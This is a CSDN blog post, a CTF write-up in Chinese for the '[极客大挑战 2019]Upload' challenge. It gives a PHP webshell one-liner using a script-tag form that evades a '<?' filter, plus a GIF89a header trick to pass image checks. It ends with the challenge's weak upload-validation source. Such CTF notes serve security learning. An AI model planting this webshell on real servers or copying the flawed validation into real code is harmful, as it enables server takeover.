[极客大挑战 2019]Upload

最新推荐文章于 2024-02-20 20:57:51 发布

c4fx

最新推荐文章于 2024-02-20 20:57:51 发布

阅读量506

点赞数

分类专栏： CTF题目笔记文章标签： web安全

本文链接：https://blog.csdn.net/weixin_52116519/article/details/124169313

版权

CTF题目笔记专栏收录该内容

37 篇文章 6 订阅

订阅专栏

1、上传合适的文件，但是png不行
在这里插入图片描述 2、上传一句话木马，但是过滤了<?
3、上传这个<script language=php>eval($_POST[1])</script>一句话木马，前几天刚遇到类似问题，好在还没忘记。

4、添加GIF89a
在这里插入图片描述 5、
6、
7、
8、
9、访问，getshell
10、flag
11、连蚁剑，看源码

<?php
$file = $_FILES["file"];

// 允许上传的图片后缀
$allowedExts = array("php","php2","php3","php4","php5","pht","phtm");
$temp = explode(".", $file["name"]);
$extension = strtolower(end($temp));        // 获取文件后缀名
$image_type = @exif_imagetype($file["tmp_name"]);
if ((($file["type"] == "image/gif")
|| ($file["type"] == "image/jpeg")
|| ($file["type"] == "image/jpg")
|| ($file["type"] == "image/pjpeg")
|| ($file["type"] == "image/x-png")
|| ($file["type"] == "image/png"))
&&$file["size"] < 20480)    // 小于 20 kb
{
    if ($file["error"] > 0){

        echo "ERROR!!!";
    }
    elseif (in_array($extension, $allowedExts)) {
        echo "NOT！".$extension."!";
    }  
    elseif (mb_strpos(file_get_contents($file["tmp_name"]), "<?") !== FALSE) {
        echo "NO! HACKER! your file included '&#x3C;&#x3F;'";
    }
    elseif (!$image_type) {
        echo "Don't lie to me, it's not image at all!!!";
    }
    else{
        $fileName='./upload/'.$file['name'];
        move_uploaded_file($file['tmp_name'],$fileName); 
        echo "上传文件名: " . $file["name"] . "<br>";
    }
}
else
{
    echo "Not image!";
}
?>

c4fx

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
[极客大挑战 2019]Upload

1、上传合适的文件，但是png不行2、上传一句话木马，但是过滤了<?3、上传这个<script language=php>eval($_POST[1])</script>一句话木马，前几天刚遇到类似问题，好在还没忘记。4、添加GIF89a5、6、7、8、9、访问，getshell10、flag11、连蚁剑，看源码<?php$file = $_FILES["file"];// 允许上传的图片后缀$allowedExts = array("ph
复制链接

扫一扫